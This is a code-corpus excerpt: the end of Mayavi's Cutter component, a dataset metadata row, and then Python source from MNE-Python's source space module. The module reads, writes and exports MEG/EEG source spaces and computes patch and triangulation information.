        # Guard clause: nothing to do until an input with outputs exists.
        if len(self.inputs) == 0 or len(self.inputs[0].outputs) == 0:
            return
        cutter = self.cutter
        self.configure_connection(cutter, self.inputs[0])
        cutter.update()
        self.outputs = [cutter.output]

    def update_data(self):
        """Propagate an upstream data change downstream.

        Invoked (automatically) when any of the inputs sends a
        `data_changed` event.
        """
        self.data_changed = True

    ######################################################################
    # `Cutter` interface
    ######################################################################
    def _get_cut_function(self):
        # Property getter: forward to the wrapped tvtk object.
        return self.cutter.cut_function

    def _set_cut_function(self, val):
        # Property setter: keep the old value so a proper trait change
        # notification can be fired for 'cut_function'.
        previous = self.cutter.cut_function
        self.cutter.cut_function = val
        self.trait_property_changed('cut_function', previous, val)
| dmsurti/mayavi | mayavi/components/cutter.py | Python | bsd-3-clause | 2,478 | [
"Mayavi"
] | bfd4bdecd4445d0a5e03e69aed198b155d4953efa89258d96d74b3e8c66bc7ad |
# Authors: Alexandre Gramfort <alexandre.gramfort@telecom-paristech.fr>
# Matti Hamalainen <msh@nmr.mgh.harvard.edu>
#
# License: BSD (3-clause)
import numpy as np
import os
import os.path as op
from scipy import sparse, linalg
from copy import deepcopy
from .io.constants import FIFF
from .io.tree import dir_tree_find
from .io.tag import find_tag, read_tag
from .io.open import fiff_open
from .io.write import (start_block, end_block, write_int,
write_float_sparse_rcs, write_string,
write_float_matrix, write_int_matrix,
write_coord_trans, start_file, end_file, write_id)
from .bem import read_bem_surfaces
from .surface import (read_surface, _create_surf_spacing, _get_ico_surface,
_tessellate_sphere_surf, _get_surf_neighbors,
_read_surface_geom, _normalize_vectors,
_complete_surface_info, _compute_nearest,
fast_cross_3d, _fast_cross_nd_sum, mesh_dist,
_triangle_neighbors)
from .utils import (get_subjects_dir, run_subprocess, has_freesurfer,
has_nibabel, check_fname, logger, verbose,
check_version, _get_call_line)
from .fixes import in1d, partial, gzip_open, meshgrid
from .parallel import parallel_func, check_n_jobs
from .transforms import (invert_transform, apply_trans, _print_coord_trans,
combine_transforms, _get_mri_head_t,
_coord_frame_name, Transform)
from .externals.six import string_types
def _get_lut():
    """Load the FreeSurfer color lookup table shipped with the package.

    Returns a structured array with 'id' and 'name' fields read from
    data/FreeSurferColorLUT.txt next to this module.
    """
    lut_fname = op.join(op.dirname(__file__), 'data',
                        'FreeSurferColorLUT.txt')
    return np.genfromtxt(lut_fname, dtype=None,
                         usecols=(0, 1), names=['id', 'name'])
def _get_lut_id(lut, label, use_lut):
"""Helper to convert a label to a LUT ID number"""
if not use_lut:
return 1
assert isinstance(label, string_types)
mask = (lut['name'] == label.encode('utf-8'))
assert mask.sum() == 1
return lut['id'][mask]
class SourceSpaces(list):
"""Represent a list of source space
Currently implemented as a list of dictionaries containing the source
space information
Parameters
----------
source_spaces : list
A list of dictionaries containing the source space information.
info : dict
Dictionary with information about the creation of the source space
file. Has keys 'working_dir' and 'command_line'.
Attributes
----------
info : dict
Dictionary with information about the creation of the source space
file. Has keys 'working_dir' and 'command_line'.
"""
def __init__(self, source_spaces, info=None):
super(SourceSpaces, self).__init__(source_spaces)
if info is None:
self.info = dict()
else:
self.info = dict(info)
def __repr__(self):
ss_repr = []
for ss in self:
ss_type = ss['type']
if ss_type == 'vol':
if 'seg_name' in ss:
r = ("'vol' (%s), n_used=%i"
% (ss['seg_name'], ss['nuse']))
else:
r = ("'vol', shape=%s, n_used=%i"
% (repr(ss['shape']), ss['nuse']))
elif ss_type == 'surf':
r = "'surf', n_vertices=%i, n_used=%i" % (ss['np'], ss['nuse'])
else:
r = "%r" % ss_type
coord_frame = ss['coord_frame']
if isinstance(coord_frame, np.ndarray):
coord_frame = coord_frame[0]
r += ', coordinate_frame=%s' % _coord_frame_name(coord_frame)
ss_repr.append('<%s>' % r)
ss_repr = ', '.join(ss_repr)
return "<SourceSpaces: [{ss}]>".format(ss=ss_repr)
def __add__(self, other):
return SourceSpaces(list.__add__(self, other))
def copy(self):
"""Make a copy of the source spaces
Returns
-------
src : instance of SourceSpaces
The copied source spaces.
"""
src = deepcopy(self)
return src
    def save(self, fname):
        """Save the source spaces to a fif file.

        Delegates to ``write_source_spaces``.

        Parameters
        ----------
        fname : str
            File to write.
        """
        write_source_spaces(fname, self)
    @verbose
    def export_volume(self, fname, include_surfaces=True,
                      include_discrete=True, dest='mri', trans=None,
                      mri_resolution=False, use_lut=True, verbose=None):
        """Export source spaces to a nifti or mgz file.

        Parameters
        ----------
        fname : str
            Name of nifti or mgz file to write.
        include_surfaces : bool
            If True, include surface source spaces.
        include_discrete : bool
            If True, include discrete source spaces.
        dest : 'mri' | 'surf'
            If 'mri' the volume is defined in the coordinate system of the
            original T1 image. If 'surf' the coordinate system of the
            FreeSurfer surface is used (Surface RAS).
        trans : dict, str, or None
            Either a transformation filename (usually made using mne_analyze)
            or an info dict (usually opened using read_trans()).
            If string, an ending of `.fif` or `.fif.gz` will be assumed to be
            in FIF format, any other ending will be assumed to be a text file
            with a 4x4 transformation matrix (like the `--trans` MNE-C
            option). Must be provided if source spaces are in head
            coordinates and include_surfaces and mri_resolution are True.
        mri_resolution : bool
            If True, the image is saved in MRI resolution
            (e.g. 256 x 256 x 256).
        use_lut : bool
            If True, assigns a numeric value to each source space that
            corresponds to a color on the freesurfer lookup table.
        verbose : bool, str, int, or None
            If not None, override default verbose level (see mne.verbose).

        Notes
        -----
        This method requires nibabel.
        """
        # import nibabel or raise error
        try:
            import nibabel as nib
        except ImportError:
            raise ImportError('This function requires nibabel.')

        # Check coordinate frames of each source space
        coord_frames = np.array([s['coord_frame'] for s in self])

        # Raise error if trans is not provided when head coordinates are used
        # and mri_resolution and include_surfaces are true
        if (coord_frames == FIFF.FIFFV_COORD_HEAD).all():
            coords = 'head'  # all sources in head coordinates
            if mri_resolution and include_surfaces:
                if trans is None:
                    raise ValueError('trans containing mri to head transform '
                                     'must be provided if mri_resolution and '
                                     'include_surfaces are true and surfaces '
                                     'are in head coordinates')
            elif trans is not None:
                logger.info('trans is not needed and will not be used unless '
                            'include_surfaces and mri_resolution are True.')
        elif (coord_frames == FIFF.FIFFV_COORD_MRI).all():
            coords = 'mri'  # all sources in mri coordinates
            if trans is not None:
                logger.info('trans is not needed and will not be used unless '
                            'sources are in head coordinates.')
        # Raise error if all sources are not in the same space, or sources are
        # not in mri or head coordinates
        else:
            raise ValueError('All sources must be in head coordinates or all '
                             'sources must be in mri coordinates.')

        # use lookup table to assign values to source spaces
        logger.info('Reading FreeSurfer lookup table')
        # read the lookup table
        lut = _get_lut()

        # Setup a dictionary of source types
        src_types = dict(volume=[], surface=[], discrete=[])

        # Populate dictionary of source types
        for src in self:
            # volume sources
            if src['type'] == 'vol':
                src_types['volume'].append(src)
            # surface sources
            elif src['type'] == 'surf':
                src_types['surface'].append(src)
            # discrete sources
            elif src['type'] == 'discrete':
                src_types['discrete'].append(src)
            # raise an error if dealing with source type other than volume
            # surface or discrete
            else:
                raise ValueError('Unrecognized source type: %s.' % src['type'])

        # Get shape, inuse array and interpolation matrix from volume sources
        first_vol = True  # mark the first volume source
        # Loop through the volume sources
        for vs in src_types['volume']:
            # read the lookup table value for segmented volume
            if 'seg_name' not in vs:
                raise ValueError('Volume sources should be segments, '
                                 'not the entire volume.')
            # find the color value for this volume
            i = _get_lut_id(lut, vs['seg_name'], use_lut)

            if first_vol:
                # get the inuse array
                if mri_resolution:
                    # read the mri file used to generate volumes
                    aseg = nib.load(vs['mri_file'])

                    # get the voxel space shape
                    shape3d = (vs['mri_height'], vs['mri_depth'],
                               vs['mri_width'])

                    # get the values for this volume
                    inuse = i * (aseg.get_data() == i).astype(int)
                    # store as 1D array
                    # NOTE(review): ndarray.ravel expects an order string
                    # ('C'/'F'), not a tuple -- confirm the
                    # mri_resolution=True path actually runs as intended.
                    inuse = inuse.ravel((2, 1, 0))
                else:
                    inuse = i * vs['inuse']

                    # get the volume source space shape
                    shape = vs['shape']

                    # read the shape in reverse order
                    # (otherwise results are scrambled)
                    shape3d = (shape[2], shape[1], shape[0])
                first_vol = False
            else:
                # update the inuse array
                if mri_resolution:
                    # get the values for this volume
                    use = i * (aseg.get_data() == i).astype(int)
                    inuse += use.ravel((2, 1, 0))
                else:
                    inuse += i * vs['inuse']

        # Raise error if there are no volume source spaces
        if first_vol:
            raise ValueError('Source spaces must contain at least one volume.')

        # create 3d grid in the MRI_VOXEL coordinate frame
        # len of inuse array should match shape regardless of mri_resolution
        assert len(inuse) == np.prod(shape3d)

        # setup the image in 3d space
        img = inuse.reshape(shape3d).T

        # include surface and/or discrete source spaces
        if include_surfaces or include_discrete:

            # setup affine transform for source spaces
            # NOTE(review): `vs` is the last volume source from the loop
            # above -- presumably all volume sources share the same MRI
            # transforms; verify against the generation code.
            if mri_resolution:
                # get the MRI to MRI_VOXEL transform
                affine = invert_transform(vs['vox_mri_t'])
            else:
                # get the MRI to SOURCE (MRI_VOXEL) transform
                affine = invert_transform(vs['src_mri_t'])

            # modify affine if in head coordinates
            if coords == 'head':
                # read mri -> head transformation
                mri_head_t = _get_mri_head_t(trans)[0]

                # get the HEAD to MRI transform
                head_mri_t = invert_transform(mri_head_t)

                # combine transforms, from HEAD to MRI_VOXEL
                affine = combine_transforms(head_mri_t, affine,
                                            'head', 'mri_voxel')

            # loop through the surface source spaces
            if include_surfaces:

                # get the surface names (assumes left, right order. may want
                # to add these names during source space generation
                surf_names = ['Left-Cerebral-Cortex', 'Right-Cerebral-Cortex']

                for i, surf in enumerate(src_types['surface']):
                    # convert vertex positions from their native space
                    # (either HEAD or MRI) to MRI_VOXEL space
                    srf_rr = apply_trans(affine['trans'], surf['rr'])

                    # convert to numeric indices
                    ix_orig, iy_orig, iz_orig = srf_rr.T.round().astype(int)

                    # clip indices outside of volume space
                    ix_clip = np.maximum(np.minimum(ix_orig, shape3d[2] - 1),
                                         0)
                    iy_clip = np.maximum(np.minimum(iy_orig, shape3d[1] - 1),
                                         0)
                    iz_clip = np.maximum(np.minimum(iz_orig, shape3d[0] - 1),
                                         0)

                    # compare original and clipped indices
                    n_diff = np.array((ix_orig != ix_clip, iy_orig != iy_clip,
                                       iz_orig != iz_clip)).any(0).sum()

                    # generate use warnings for clipping
                    if n_diff > 0:
                        logger.warning('%s surface vertices lay outside '
                                       'of volume space. Consider using a '
                                       'larger volume space.' % n_diff)

                    # get surface id or use default value
                    i = _get_lut_id(lut, surf_names[i], use_lut)

                    # update image to include surface voxels
                    img[ix_clip, iy_clip, iz_clip] = i

            # loop through discrete source spaces
            if include_discrete:
                for i, disc in enumerate(src_types['discrete']):
                    # convert vertex positions from their native space
                    # (either HEAD or MRI) to MRI_VOXEL space
                    disc_rr = apply_trans(affine['trans'], disc['rr'])

                    # convert to numeric indices
                    ix_orig, iy_orig, iz_orig = disc_rr.T.astype(int)

                    # clip indices outside of volume space
                    ix_clip = np.maximum(np.minimum(ix_orig, shape3d[2] - 1),
                                         0)
                    iy_clip = np.maximum(np.minimum(iy_orig, shape3d[1] - 1),
                                         0)
                    iz_clip = np.maximum(np.minimum(iz_orig, shape3d[0] - 1),
                                         0)

                    # compare original and clipped indices
                    n_diff = np.array((ix_orig != ix_clip, iy_orig != iy_clip,
                                       iz_orig != iz_clip)).any(0).sum()

                    # generate use warnings for clipping
                    if n_diff > 0:
                        logger.warning('%s discrete vertices lay outside '
                                       'of volume space. Consider using a '
                                       'larger volume space.' % n_diff)

                    # set default value
                    img[ix_clip, iy_clip, iz_clip] = 1

                    if use_lut:
                        logger.info('Discrete sources do not have values on '
                                    'the lookup table. Defaulting to 1.')

        # calculate affine transform for image (MRI_VOXEL to RAS)
        if mri_resolution:
            # MRI_VOXEL to MRI transform
            transform = vs['vox_mri_t'].copy()
        else:
            # MRI_VOXEL to MRI transform
            # NOTE: 'src' indicates downsampled version of MRI_VOXEL
            transform = vs['src_mri_t'].copy()
        if dest == 'mri':
            # combine with MRI to RAS transform
            transform = combine_transforms(transform, vs['mri_ras_t'],
                                           transform['from'],
                                           vs['mri_ras_t']['to'])

        # now setup the affine for volume image
        affine = transform['trans']
        # make sure affine converts from m to mm
        affine[:3] *= 1e3

        # save volume data

        # setup image for file
        if fname.endswith(('.nii', '.nii.gz')):  # save as nifti
            # setup the nifti header
            hdr = nib.Nifti1Header()
            hdr.set_xyzt_units('mm')
            # save the nifti image
            img = nib.Nifti1Image(img, affine, header=hdr)
        elif fname.endswith('.mgz'):  # save as mgh
            # convert to float32 (float64 not currently supported)
            img = img.astype('float32')
            # save the mgh image
            img = nib.freesurfer.mghformat.MGHImage(img, affine)
        else:
            raise(ValueError('Unrecognized file extension'))

        # write image to file
        nib.save(img, fname)
def _add_patch_info(s):
    """Add patch information to a source space in place.

    Uses the 'nearest' vector (mapping each high-resolution vertex to its
    nearest in-use source vertex) to build, for every in-use vertex, the
    list of neighboring high-resolution vertices forming its patch.

    Parameters
    ----------
    s : dict
        The source space; 'pinfo' and 'patch_inds' entries are added.
    """
    nearest = s['nearest']
    if nearest is None:
        # no patch data available for this source space
        s['pinfo'] = None
        s['patch_inds'] = None
        return

    logger.info(' Computing patch statistics...')
    order = np.argsort(nearest)
    sorted_near = nearest[order]
    # positions where the sorted 'nearest' value changes: run boundaries
    breaks = np.where(sorted_near[1:] != sorted_near[:-1])[0] + 1
    run_starts = np.r_[[0], breaks]
    run_stops = np.r_[breaks, [len(nearest)]]
    # one sorted index-group per run of identical 'nearest' values
    s['pinfo'] = [np.sort(order[lo:hi])
                  for lo, hi in zip(run_starts, run_stops)]

    # compute patch indices of the in-use source space vertices
    patch_verts = sorted_near[breaks - 1]
    s['patch_inds'] = np.searchsorted(patch_verts, s['vertno'])
    logger.info(' Patch information added...')
@verbose
def _read_source_spaces_from_tree(fid, tree, patch_stats=False,
                                  verbose=None):
    """Read the source spaces from a FIF file.

    Parameters
    ----------
    fid : file descriptor
        An open file descriptor.
    tree : dict
        The FIF tree structure if source is a file id.
    patch_stats : bool, optional (default False)
        Calculate and add cortical patch statistics to the surfaces.
    verbose : bool, str, int, or None
        If not None, override default verbose level (see mne.verbose).

    Returns
    -------
    src : SourceSpaces
        The source spaces.
    """
    # Find all source spaces
    spaces = dir_tree_find(tree, FIFF.FIFFB_MNE_SOURCE_SPACE)
    if len(spaces) == 0:
        raise ValueError('No source spaces found')

    src = list()
    for s in spaces:
        logger.info(' Reading a source space...')
        this = _read_one_source_space(fid, s)
        logger.info(' [done]')
        if patch_stats:
            # add derived triangle info (centers, normals, areas)
            _complete_source_space_info(this)
        src.append(this)

    logger.info(' %d source spaces read' % len(spaces))
    return SourceSpaces(src)
@verbose
def read_source_spaces(fname, patch_stats=False, verbose=None):
    """Read the source spaces from a FIF file.

    Parameters
    ----------
    fname : str
        The name of the file, which should end with -src.fif or
        -src.fif.gz.
    patch_stats : bool, optional (default False)
        Calculate and add cortical patch statistics to the surfaces.
    verbose : bool, str, int, or None
        If not None, override default verbose level (see mne.verbose).

    Returns
    -------
    src : SourceSpaces
        The source spaces.

    See Also
    --------
    write_source_spaces, setup_source_space, setup_volume_source_space
    """
    # be more permissive on read than write (fwd/inv can contain src)
    check_fname(fname, 'source space', ('-src.fif', '-src.fif.gz',
                                        '-fwd.fif', '-fwd.fif.gz',
                                        '-inv.fif', '-inv.fif.gz'))

    ff, tree, _ = fiff_open(fname)
    with ff as fid:
        src = _read_source_spaces_from_tree(fid, tree, patch_stats=patch_stats,
                                            verbose=verbose)
        src.info['fname'] = fname

        # pick up optional environment info (working dir / command line)
        node = dir_tree_find(tree, FIFF.FIFFB_MNE_ENV)
        if node:
            node = node[0]
            for p in range(node['nent']):
                kind = node['directory'][p].kind
                pos = node['directory'][p].pos
                tag = read_tag(fid, pos)
                if kind == FIFF.FIFF_MNE_ENV_WORKING_DIR:
                    src.info['working_dir'] = tag.data
                elif kind == FIFF.FIFF_MNE_ENV_COMMAND_LINE:
                    src.info['command_line'] = tag.data
    return src
@verbose
def _read_one_source_space(fid, this, verbose=None):
    """Read one source space from an open FIF file.

    Parameters
    ----------
    fid : file descriptor
        An open file descriptor.
    this : dict
        The FIF tree node of the source space block to read.
    verbose : bool, str, int, or None
        If not None, override default verbose level (see mne.verbose).

    Returns
    -------
    res : dict
        The source space.

    Notes
    -----
    Fix: replaced the deprecated NumPy aliases ``np.float``/``np.int``
    (removed in NumPy >= 1.24) with the builtin ``float``/``int``; the
    resulting dtypes are identical.
    """
    # these two BEM tag IDs are not available in the FIFF constants
    FIFF_BEM_SURF_NTRI = 3104
    FIFF_BEM_SURF_TRIANGLES = 3106

    res = dict()

    tag = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_ID)
    if tag is None:
        res['id'] = int(FIFF.FIFFV_MNE_SURF_UNKNOWN)
    else:
        res['id'] = int(tag.data)

    tag = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_TYPE)
    if tag is None:
        raise ValueError('Unknown source space type')
    else:
        src_type = int(tag.data)
        if src_type == FIFF.FIFFV_MNE_SPACE_SURFACE:
            res['type'] = 'surf'
        elif src_type == FIFF.FIFFV_MNE_SPACE_VOLUME:
            res['type'] = 'vol'
        elif src_type == FIFF.FIFFV_MNE_SPACE_DISCRETE:
            res['type'] = 'discrete'
        else:
            raise ValueError('Unknown source space type (%d)' % src_type)

    if res['type'] == 'vol':
        # volume-specific data: voxel dims, transforms, parent MRI info
        tag = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_VOXEL_DIMS)
        if tag is not None:
            res['shape'] = tuple(tag.data)

        tag = find_tag(fid, this, FIFF.FIFF_COORD_TRANS)
        if tag is not None:
            res['src_mri_t'] = tag.data

        parent_mri = dir_tree_find(this, FIFF.FIFFB_MNE_PARENT_MRI_FILE)
        if len(parent_mri) == 0:
            # MNE 2.7.3 (and earlier) didn't store necessary information
            # about volume coordinate translations. Although there is a
            # FFIF_COORD_TRANS in the higher level of the FIFF file, this
            # doesn't contain all the info we need. Safer to return an
            # error unless a user really wants us to add backward compat.
            raise ValueError('Can not find parent MRI location. The volume '
                             'source space may have been made with an MNE '
                             'version that is too old (<= 2.7.3). Consider '
                             'updating and regenerating the inverse.')

        mri = parent_mri[0]
        for d in mri['directory']:
            if d.kind == FIFF.FIFF_COORD_TRANS:
                tag = read_tag(fid, d.pos)
                trans = tag.data
                if trans['from'] == FIFF.FIFFV_MNE_COORD_MRI_VOXEL:
                    res['vox_mri_t'] = tag.data
                if trans['to'] == FIFF.FIFFV_MNE_COORD_RAS:
                    res['mri_ras_t'] = tag.data

        tag = find_tag(fid, mri, FIFF.FIFF_MNE_SOURCE_SPACE_INTERPOLATOR)
        if tag is not None:
            res['interpolator'] = tag.data
        else:
            logger.info("Interpolation matrix for MRI not found.")

        tag = find_tag(fid, mri, FIFF.FIFF_MNE_SOURCE_SPACE_MRI_FILE)
        if tag is not None:
            res['mri_file'] = tag.data

        tag = find_tag(fid, mri, FIFF.FIFF_MRI_WIDTH)
        if tag is not None:
            res['mri_width'] = int(tag.data)

        tag = find_tag(fid, mri, FIFF.FIFF_MRI_HEIGHT)
        if tag is not None:
            res['mri_height'] = int(tag.data)

        tag = find_tag(fid, mri, FIFF.FIFF_MRI_DEPTH)
        if tag is not None:
            res['mri_depth'] = int(tag.data)

        tag = find_tag(fid, mri, FIFF.FIFF_MNE_FILE_NAME)
        if tag is not None:
            res['mri_volume_name'] = tag.data

        tag = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_NNEIGHBORS)
        if tag is not None:
            nneighbors = tag.data
            # neighbors are stored flattened; split by per-vertex counts
            tag = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_NEIGHBORS)
            offset = 0
            neighbors = []
            for n in nneighbors:
                neighbors.append(tag.data[offset:offset + n])
                offset += n
            res['neighbor_vert'] = neighbors

        tag = find_tag(fid, this, FIFF.FIFF_COMMENT)
        if tag is not None:
            res['seg_name'] = tag.data

    tag = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_NPOINTS)
    if tag is None:
        raise ValueError('Number of vertices not found')

    res['np'] = int(tag.data)

    # number of triangles: try the BEM tag first, then the MNE tag
    tag = find_tag(fid, this, FIFF_BEM_SURF_NTRI)
    if tag is None:
        tag = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_NTRI)
        if tag is None:
            res['ntri'] = 0
        else:
            res['ntri'] = int(tag.data)
    else:
        res['ntri'] = tag.data

    tag = find_tag(fid, this, FIFF.FIFF_MNE_COORD_FRAME)
    if tag is None:
        raise ValueError('Coordinate frame information not found')

    res['coord_frame'] = tag.data

    # Vertices, normals, and triangles
    tag = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_POINTS)
    if tag is None:
        raise ValueError('Vertex data not found')

    res['rr'] = tag.data.astype(float)  # double precision for mayavi
    if res['rr'].shape[0] != res['np']:
        raise ValueError('Vertex information is incorrect')

    tag = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_NORMALS)
    if tag is None:
        raise ValueError('Vertex normals not found')

    res['nn'] = tag.data
    if res['nn'].shape[0] != res['np']:
        raise ValueError('Vertex normal information is incorrect')

    if res['ntri'] > 0:
        tag = find_tag(fid, this, FIFF_BEM_SURF_TRIANGLES)
        if tag is None:
            tag = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_TRIANGLES)
            if tag is None:
                raise ValueError('Triangulation not found')
            else:
                res['tris'] = tag.data - 1  # index start at 0 in Python
        else:
            res['tris'] = tag.data - 1  # index start at 0 in Python
        if res['tris'].shape[0] != res['ntri']:
            raise ValueError('Triangulation information is incorrect')
    else:
        res['tris'] = None

    # Which vertices are active
    tag = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_NUSE)
    if tag is None:
        res['nuse'] = 0
        res['inuse'] = np.zeros(res['nuse'], dtype=int)
        res['vertno'] = None
    else:
        res['nuse'] = int(tag.data)
        tag = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_SELECTION)
        if tag is None:
            raise ValueError('Source selection information missing')

        res['inuse'] = tag.data.astype(int).T
        if len(res['inuse']) != res['np']:
            raise ValueError('Incorrect number of entries in source space '
                             'selection')

        res['vertno'] = np.where(res['inuse'])[0]

    # Use triangulation
    tag1 = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_NUSE_TRI)
    tag2 = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_USE_TRIANGLES)
    if tag1 is None or tag2 is None:
        res['nuse_tri'] = 0
        res['use_tris'] = None
    else:
        res['nuse_tri'] = tag1.data
        res['use_tris'] = tag2.data - 1  # index start at 0 in Python

    # Patch-related information
    tag1 = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_NEAREST)
    tag2 = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_NEAREST_DIST)
    if tag1 is None or tag2 is None:
        res['nearest'] = None
        res['nearest_dist'] = None
    else:
        res['nearest'] = tag1.data
        res['nearest_dist'] = tag2.data.T

    _add_patch_info(res)

    # Distances
    tag1 = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_DIST)
    tag2 = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_DIST_LIMIT)
    if tag1 is None or tag2 is None:
        res['dist'] = None
        res['dist_limit'] = None
    else:
        res['dist'] = tag1.data
        res['dist_limit'] = tag2.data
        # Add the upper triangle (only the lower one is stored)
        res['dist'] = res['dist'] + res['dist'].T
    if (res['dist'] is not None):
        logger.info(' Distance information added...')

    tag = find_tag(fid, this, FIFF.FIFF_SUBJ_HIS_ID)
    if tag is not None:
        res['subject_his_id'] = tag.data

    return res
@verbose
def _complete_source_space_info(this, verbose=None):
    """Add derived triangle info (centers, normals, areas) to a surface.

    Parameters
    ----------
    this : dict
        The source space to complete in place; 'tri_cent', 'tri_nn',
        'tri_area' (and their 'use_tri_*' counterparts when in-use
        triangles exist) are added.
    verbose : bool, str, int, or None
        If not None, override default verbose level (see mne.verbose).
    """
    # Main triangulation
    # (fix: removed a dead `this['tri_area'] = np.zeros(this['ntri'])`
    # pre-allocation that was unconditionally overwritten below)
    logger.info(' Completing triangulation info...')
    r1 = this['rr'][this['tris'][:, 0], :]
    r2 = this['rr'][this['tris'][:, 1], :]
    r3 = this['rr'][this['tris'][:, 2], :]
    this['tri_cent'] = (r1 + r2 + r3) / 3.0
    this['tri_nn'] = fast_cross_3d((r2 - r1), (r3 - r1))
    # triangle area is half the norm of the edge cross product
    size = np.sqrt(np.sum(this['tri_nn'] ** 2, axis=1))
    this['tri_area'] = size / 2.0
    this['tri_nn'] /= size[:, None]
    logger.info('[done]')

    # Selected triangles
    logger.info(' Completing selection triangulation info...')
    if this['nuse_tri'] > 0:
        r1 = this['rr'][this['use_tris'][:, 0], :]
        r2 = this['rr'][this['use_tris'][:, 1], :]
        r3 = this['rr'][this['use_tris'][:, 2], :]
        this['use_tri_cent'] = (r1 + r2 + r3) / 3.0
        this['use_tri_nn'] = fast_cross_3d((r2 - r1), (r3 - r1))
        this['use_tri_area'] = np.sqrt(np.sum(this['use_tri_nn'] ** 2, axis=1)
                                       ) / 2.0
    logger.info('[done]')
def find_source_space_hemi(src):
    """Return the hemisphere id for a source space.

    Parameters
    ----------
    src : dict
        The source space to investigate.

    Returns
    -------
    hemi : int
        Deduced hemisphere id.
    """
    # A negative sum of the x-coordinates indicates the left hemisphere.
    if src['rr'][:, 0].sum() < 0:
        return int(FIFF.FIFFV_MNE_SURF_LEFT_HEMI)
    return int(FIFF.FIFFV_MNE_SURF_RIGHT_HEMI)
def label_src_vertno_sel(label, src):
    """Find vertex numbers and indices from label.

    Parameters
    ----------
    label : Label
        Source space label.
    src : dict
        Source space.

    Returns
    -------
    vertices : list of length 2
        Vertex numbers for lh and rh.
    src_sel : array of int (len(idx) = len(vertices[0]) + len(vertices[1]))
        Indices of the selected vertices in source space.
    """
    if src[0]['type'] != 'surf':
        # Bug fix: this error was previously *returned* instead of raised,
        # so non-surface source spaces silently fell through.
        raise ValueError('Labels are only supported with surface source '
                         'spaces')

    vertno = [src[0]['vertno'], src[1]['vertno']]

    if label.hemi == 'lh':
        vertno_sel = np.intersect1d(vertno[0], label.vertices)
        src_sel = np.searchsorted(vertno[0], vertno_sel)
        vertno[0] = vertno_sel
        vertno[1] = np.array([], int)
    elif label.hemi == 'rh':
        vertno_sel = np.intersect1d(vertno[1], label.vertices)
        # right-hemisphere indices are offset by the number of lh vertices
        src_sel = np.searchsorted(vertno[1], vertno_sel) + len(vertno[0])
        vertno[0] = np.array([], int)
        vertno[1] = vertno_sel
    elif label.hemi == 'both':
        vertno_sel_lh = np.intersect1d(vertno[0], label.lh.vertices)
        src_sel_lh = np.searchsorted(vertno[0], vertno_sel_lh)
        vertno_sel_rh = np.intersect1d(vertno[1], label.rh.vertices)
        src_sel_rh = np.searchsorted(vertno[1], vertno_sel_rh) + len(vertno[0])
        src_sel = np.hstack((src_sel_lh, src_sel_rh))
        vertno = [vertno_sel_lh, vertno_sel_rh]
    else:
        raise Exception("Unknown hemisphere type")

    return vertno, src_sel
def _get_vertno(src):
return [s['vertno'] for s in src]
###############################################################################
# Write routines
@verbose
def _write_source_spaces_to_fid(fid, src, verbose=None):
    """Write the source spaces to a FIF file.

    Parameters
    ----------
    fid : file descriptor
        An open file descriptor.
    src : list
        The list of source spaces.
    verbose : bool, str, int, or None
        If not None, override default verbose level (see mne.verbose).
    """
    for s in src:
        logger.info(' Write a source space...')
        # each source space gets its own FIF block
        start_block(fid, FIFF.FIFFB_MNE_SOURCE_SPACE)
        _write_one_source_space(fid, s, verbose)
        end_block(fid, FIFF.FIFFB_MNE_SOURCE_SPACE)
        logger.info(' [done]')
    logger.info(' %d source spaces written' % len(src))
@verbose
def write_source_spaces(fname, src, verbose=None):
    """Write source spaces to a file.

    Parameters
    ----------
    fname : str
        The name of the file, which should end with -src.fif or
        -src.fif.gz.
    src : SourceSpaces
        The source spaces (as returned by read_source_spaces).
    verbose : bool, str, int, or None
        If not None, override default verbose level (see mne.verbose).

    See Also
    --------
    read_source_spaces
    """
    check_fname(fname, 'source space', ('-src.fif', '-src.fif.gz'))

    fid = start_file(fname)
    start_block(fid, FIFF.FIFFB_MNE)

    # optional environment block (working dir / command line) comes first
    if src.info:
        start_block(fid, FIFF.FIFFB_MNE_ENV)

        write_id(fid, FIFF.FIFF_BLOCK_ID)

        data = src.info.get('working_dir', None)
        if data:
            write_string(fid, FIFF.FIFF_MNE_ENV_WORKING_DIR, data)
        data = src.info.get('command_line', None)
        if data:
            write_string(fid, FIFF.FIFF_MNE_ENV_COMMAND_LINE, data)

        end_block(fid, FIFF.FIFFB_MNE_ENV)

    _write_source_spaces_to_fid(fid, src, verbose)

    end_block(fid, FIFF.FIFFB_MNE)
    end_file(fid)
def _write_one_source_space(fid, this, verbose=None):
    """Write one source space to an open FIF file.

    Parameters
    ----------
    fid : file descriptor
        An open file descriptor.
    this : dict
        The source space to write.
    verbose : bool, str, int, or None
        Accepted for API symmetry; not referenced in this function.
    """
    if this['type'] == 'surf':
        src_type = FIFF.FIFFV_MNE_SPACE_SURFACE
    elif this['type'] == 'vol':
        src_type = FIFF.FIFFV_MNE_SPACE_VOLUME
    elif this['type'] == 'discrete':
        src_type = FIFF.FIFFV_MNE_SPACE_DISCRETE
    else:
        raise ValueError('Unknown source space type (%s)' % this['type'])
    write_int(fid, FIFF.FIFF_MNE_SOURCE_SPACE_TYPE, src_type)

    if this['id'] >= 0:
        write_int(fid, FIFF.FIFF_MNE_SOURCE_SPACE_ID, this['id'])

    data = this.get('subject_his_id', None)
    if data:
        write_string(fid, FIFF.FIFF_SUBJ_HIS_ID, data)
